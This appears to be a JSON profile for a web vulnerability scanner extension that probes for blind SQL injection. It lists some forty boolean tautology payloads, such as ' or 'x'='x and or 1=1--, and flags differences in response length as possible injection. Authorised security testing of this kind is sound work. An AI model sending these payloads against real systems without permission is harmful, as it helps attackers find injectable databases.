[{"Name":"BlindSQLi-ContentLength",
"Active":true,
"Scanner":1,
"Author":"@egarme",
"Payloads":[" \u0027-\u0027",
" \u0027 \u0027",
" \u0027\u0026\u0027",
" \u0027^\u0027",
" \u0027*\u0027",
" \u0027 or \u0027\u0027-\u0027",
" \u0027 or \u0027\u0027 \u0027",
" \u0027 or \u0027\u0027\u0026\u0027",
" \u0027 or \u0027\u0027^\u0027",
" \u0027 or \u0027\u0027*\u0027",
" \"-\"",
" \" \"",
" \"\u0026\"",
" \"^\"",
" \"*\"",
" \" or \"\"-\"",
" \" or \"\" \"",
" \" or \"\"\u0026\"",
" \" or \"\"^\"",
" \" or \"\"*\"",
" or true--",
" \" or true--",
" \u0027 or true--",
" \") or true--",
" \u0027) or true--",
" \u0027 or \u0027x\u0027\u003d\u0027x",
" \u0027) or (\u0027x\u0027)\u003d(\u0027x",
" \u0027)) or ((\u0027x\u0027))\u003d((\u0027x",
" \" or \"x\"\u003d\"x",
" \") or (\"x\")\u003d(\"x",
" \")) or ((\"x\"))\u003d((\"x",
" or 1\u003d1",
" or 1\u003d1-- ",
" or 1\u003d1#",
" or 1\u003d1/*",
" or 1\u003d2--",
" or 1\u003d2",
" or 1\u003d2-- ",
" or 1\u003d2#",
" or 1\u003d2/*",
" \u0027 or \u00271\u0027\u003d\u00271",
" \u0027 or \u00271\u0027\u003d\u00272"],
"Encoder":[],
"UrlEncode":false,
"CharsToUrlEncode":"",
"Grep":[],
"Tags":["SQLi"],
"PayloadResponse":false,
"NotResponse":false,
"TimeOut":"",
"isTime":false,
"contentLength":"1000",
"iscontentLength":false,
"CaseSensitive":false,
"isReplace":false,
"Replace1":"",
"Replace2":"",
"ExcludeHTTP":true,
"OnlyHTTP":false,
"IsContentType":false,
"ContentType":"",
"NegativeCT":false,
"IsResponseCode":false,
"ResponseCode":"",
"NegativeRC":false,
"MatchType":6,
"RedirType":4,
"MaxRedir":5,
"spaceEncode":true,
"payloadPosition":2,
"sEncode":"%20",
"payloadsFile":"",
"grepsFile":"",
"IssueName":"BlindSQLi-ContentLength",
"IssueSeverity":"High",
"IssueConfidence":"Tentative",
"IssueDetail":"Possible Blind SQLi with payload:   \u003cgrep\u003e",
"RemediationDetail":"",
"IssueBackground":"",
"RemediationBackground":""}]